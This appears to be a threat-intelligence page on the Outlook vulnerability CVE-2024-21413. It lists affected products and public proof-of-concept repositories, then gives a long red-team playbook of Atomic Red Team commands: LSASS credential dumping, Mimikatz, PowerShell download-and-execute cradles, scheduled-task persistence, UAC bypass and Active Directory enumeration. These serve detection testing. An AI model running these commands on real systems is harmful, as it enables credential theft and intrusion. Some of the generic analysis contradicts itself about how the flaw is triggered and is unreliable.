CVE-2024-21413
Overview
This vulnerability is a remote code execution flaw caused by improper input validation in Microsoft Outlook's message processing component. Specifically, the root cause lies in the failure to properly handle crafted email content, allowing malicious data to be executed within the Outlook process. The affected component is Microsoft Outlook within the Office 2019 and related Microsoft 365 Apps environments, where the email rendering engine fails to sanitize certain input vectors.
Vulnerability Description
Microsoft Outlook Remote Code Execution Vulnerability
Impact
An attacker can execute arbitrary code on the victim's system remotely by sending a crafted email, without requiring any user interaction or authentication. This enables full compromise of the affected system, including the ability to install programs, view, change, or delete data, and create new accounts with full user rights. The vulnerability allows attackers to gain persistent control over enterprise environments, potentially leading to data breaches, lateral movement, and disruption of business operations.
Solution
Microsoft has released security updates addressing this vulnerability for Microsoft Office 2019 and Microsoft 365 Apps enterprise editions. Administrators should apply the patches detailed in the Microsoft Security Response Center advisory at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413. The update is included in the latest cumulative security update for Office 2019. No specific workarounds are recommended; applying the official patches is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Microsoft Outlook is characterized by a critical flaw that allows for remote code execution. This issue arises from improper handling of objects in memory, which can be exploited by an attacker to execute arbitrary code on a victim's machine. When a user opens a specially crafted email or interacts with a malicious attachment, the vulnerability can be triggered, leading to unauthorized actions being performed on the system. The severity of this vulnerability is underscored by its high CVSS score, indicating that successful exploitation could result in significant damage, including data breaches and system compromise.
Attack vectors for this vulnerability primarily involve social engineering tactics. An attacker may craft a deceptive email that appears legitimate, enticing the recipient to open the email or download an attachment. Once the malicious content is executed, the attacker can gain control over the affected system, potentially leading to further exploitation of the network. Additionally, this vulnerability can be exploited through phishing campaigns, where users are lured into clicking on links that lead to malicious payloads. The ease of exploitation, combined with the widespread use of Microsoft Outlook in corporate environments, makes this a particularly dangerous threat.
The real-world impact of this vulnerability can be profound, especially for organizations that rely heavily on Microsoft Office products for daily operations. Successful exploitation can lead to unauthorized access to sensitive data, including intellectual property and personal information, resulting in reputational damage and financial loss. Moreover, the potential for lateral movement within a network increases the risk of a full-scale breach, where attackers can access additional systems and data. The business risk is compounded by the potential for regulatory penalties if sensitive data is compromised, particularly in industries governed by strict data protection regulations.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected Microsoft products is crucial in reducing the risk of exploitation. Security awareness training for employees can also play a vital role in preventing successful phishing attempts, as users become more adept at identifying suspicious emails and attachments. Additionally, deploying advanced threat detection solutions, such as endpoint detection and response (EDR) tools, can help identify and respond to anomalous behavior indicative of exploitation. Network segmentation and strict access controls can further limit the potential impact of a successful attack, ensuring that even if one system is compromised, the threat does not spread throughout the organization.
In conclusion, the vulnerability present in Microsoft Outlook represents a significant threat to organizations that utilize this software. The combination of high exploitability and the potential for severe consequences necessitates immediate attention from cybersecurity professionals. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against this and similar vulnerabilities. Proactive measures, including timely updates, employee training, and robust security practices, are essential to mitigating the risks associated with this critical flaw.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-21413, accompanied by the emergence of new proof-of-concept exploits circulating publicly. Our telemetry indicates that adversaries are increasingly leveraging these tools to probe vulnerable Microsoft Office 2019 environments, signaling a broadening of the exploit landscape. Although the EPSS score remains high, the slight downward trend suggests some fluctuation in exploit attempts; however, the availability of multiple functional exploit variants heightens the risk of successful compromise. Notably, while no direct ransomware campaigns have been conclusively linked to this vulnerability, monitoring continues given the presence of ransomware groups such as BianLian and Black Basta within the threat ecosystem. This development elevates the threat level by increasing the likelihood of remote code execution attacks, underscoring the urgency for defenders to maintain vigilant detection and response postures.
Update 2 — July 04, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-21413, accompanied by the emergence of new proof-of-concept exploits circulating within attacker communities. This development signals a broadening of the exploit landscape, which may lower the barrier for threat actors to weaponize this critical Microsoft Outlook vulnerability. Although ransomware groups have not yet been definitively linked to active campaigns exploiting this flaw, the presence of multiple advanced exploit variants combined with increased detection activity elevates the overall risk profile. Defenders should recognize that the expanding availability of functional exploits increases the likelihood of opportunistic attacks, potentially accelerating the timeline for compromise in unpatched environments. Consequently, the threat level associated with CVE-2024-21413 should be considered heightened, warranting sustained vigilance in monitoring and response efforts.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | 365 Apps | N/A |
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*
|
|
|
Microsoft | Office 2016 | N/A |
cpe:2.3:a:microsoft:office_2016:-:*:*:*:-:*:x64:*
|
|
|
Microsoft | Office 2016 | N/A |
cpe:2.3:a:microsoft:office_2016:-:*:*:*:-:*:x86:*
|
|
|
Microsoft | Office 2019 | N/A |
cpe:2.3:a:microsoft:office_2019:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Office 2019 | N/A |
cpe:2.3:a:microsoft:office_2019:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Office Long Term Servicing Channel | 2021 |
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (37)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Microsoft-Outlook-Remote-Code-Execution-Vulnerability
|
xaitax | 765 | 166 | 2024-02-16 | View |
|
CMNatic/CVE-2024-21413
CVE-2024-21413 PoC for THM Lab
|
CMNatic | 259 | 60 | 2024-02-17 | View |
|
duy-31/CVE-2024-21413
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
|
duy-31 | 157 | 33 | 2024-02-15 | View |
|
ThemeHackers/CVE-2024-21413
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
|
ThemeHackers | 25 | 8 | 2024-08-31 | View |
|
r00tb1t/CVE-2024-21413-POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC
|
r00tb1t | 17 | 2 | 2024-02-16 | View |
|
mmathivanan17/CVE-2024-21413
Outlook exploitation
|
mmathivanan17 | 11 | 6 | 2025-11-30 | View |
|
Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
|
Mdusmandasthaheer | 5 | 3 | 2024-02-20 | View |
|
ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Bu betik, Microsoft Outlook'ta keşfedilen ve CVSS değeri 9.8 olan önemli bir güvenlik açığı olan CVE-2024-21413 için bir...
|
ahmetkarakayaoffical | 4 | 2 | 2024-02-23 | View |
|
dshabani96/CVE-2024-21413
|
dshabani96 | 2 | 3 | 2024-02-29 | View |
|
D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB
|
D1se0 | 4 | 0 | 2024-12-04 | View |
|
X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit
CVE-2024-21413 Microsoft Outlook RCE Exploit
|
X-Projetion | 2 | 0 | 2024-05-03 | View |
|
gurleen-147/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC
This repository contains research notes and a high-level proof-of-concept (PoC) for CVE-2024-21413, a vulnerability obse...
|
gurleen-147 | 2 | 0 | 2025-11-06 | View |
|
MSeymenD/CVE-2024-21413
CVE-2024-21413 Açığını Kullanarak Giriş Bilgilerini Alma
|
MSeymenD | 0 | 1 | 2024-02-19 | View |
|
PolarisXSec/CVE-2024-21413
|
PolarisXSec | 1 | 0 | 2025-05-11 | View |
|
YoguiCR/CVE-2024-21413-Outlook-Assessment
|
YoguiCR | 0 | 0 | 2026-07-04 | View |
|
H1ssBl1tz/Blind-Trust-CVE-2024-21413-Research
A security research tool for simulating targeted phishing campaigns using CVE-2024-21413 (Moniker Link).
|
H1ssBl1tz | 0 | 0 | 2026-06-23 | View |
|
Dhananjayasj/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
|
Dhananjayasj | 0 | 0 | 2026-05-30 | View |
|
KaiHaoChen04/monikerlinktest
cve-2024-21413
|
KaiHaoChen04 | 0 | 0 | 2026-05-12 | View |
|
bhatbhupendra/Moniker-Link--CVE-2024-21413-
|
bhatbhupendra | 0 | 0 | 2026-04-25 | View |
|
FathanahHidayati/https-github.com-xaitax-CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
|
FathanahHidayati | 0 | 0 | 2026-04-14 | View |
|
KartheekKandalam99/SVPT_CW_2
CVE-2024-21413 Setup for CW
|
KartheekKandalam99 | 0 | 0 | 2024-04-13 | View |
|
ShubhamKanhere307/CVE-2024-21413
This script is the Proof of Concept (PoC) of the CVE-2024-21413, a significant security vulnerability discovered in the ...
|
ShubhamKanhere307 | 0 | 0 | 2024-06-18 | View |
|
olebris/CVE-2024-21413
CVE-2024-21413 PoC
|
olebris | 0 | 0 | 2024-06-28 | View |
|
Redfox-Security/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape
|
Redfox-Security | 0 | 0 | 2024-07-03 | View |
|
ArtemCyberLab/Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413
The project was created to demonstrate the use of various tools for capturing NTLM hashes from users on a network and fo...
|
ArtemCyberLab | 0 | 0 | 2025-03-25 | View |
|
eylommaayan/THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-
ב־13 בפברואר 2024 פרסמה Microsoft חולשת אבטחה חמורה ב־Microsoft Outlook, אשר קיבלה את הזיהוי CVE-2024-21413, ומוכרת בשם ...
|
eylommaayan | 0 | 0 | 2026-01-01 | View |
|
securenetexpert/CVE-2024-21413-Moniker-Link-Writeup
Technical write-up on CVE-2024-21413 (Moniker Link vulnerability)
|
securenetexpert | 0 | 0 | 2026-02-07 | View |
|
SallocinAvalcante/lab-SMB-responder-CVE-2024-21413
Laboratorio criado para PenTest da Vuln CVE 2024-214113(MONIKER LINK).
|
SallocinAvalcante | 0 | 0 | 2026-02-10 | View |
|
E-m-e-k-a/Moniker-Link-Lab-Setup
Penetration testing lab demonstrating CVE-2024-21413 moniker link exploitation for NTLM credential theft, including atta...
|
E-m-e-k-a | 0 | 0 | 2026-03-08 | View |
|
TheMursalin/HTB-Mailing-A-Complete-Walkthrough
If you've been grinding through HackTheBox machines, Mailing is one of those boxes that genuinely teaches you something....
|
TheMursalin | 0 | 0 | 2026-03-25 | View |
|
pedro-lucas-melo/Estudo-de-Caso-CVE-2024-21413
Um estudo de caso do CVE-2024-21413. Usado como parâmetro a sala do TryHackMe Moniker Link (CVE-2024-21413). Feito ediçõ...
|
pedro-lucas-melo | 0 | 0 | 2026-04-05 | View |
|
ViniciusFariasDev/cve-2024-21413-outlook-monikerlink-lab
|
ViniciusFariasDev | 0 | 0 | 2026-01-19 | View |
|
th3Hellion/CVE-2024-21413
|
th3Hellion | 0 | 0 | 2024-05-11 | View |
|
dionissh/CVE-2024-21413
|
dionissh | 0 | 0 | 2026-01-25 | View |
|
MQKGitHub/Moniker-Link-CVE-2024-21413
|
MQKGitHub | 0 | 0 | 2025-05-30 | View |
|
yass2400012/Email-exploit-Moniker-Link-CVE-2024-21413-
|
yass2400012 | 0 | 0 | 2025-09-23 | View |
|
hau2212/Moniker-Link-CVE-2024-21413-
On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE & credential leak vulnerability with the assigned CV...
|
hau2212 | 0 | 0 | 2025-11-20 | View |
Threat Feed
21 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-21413 |
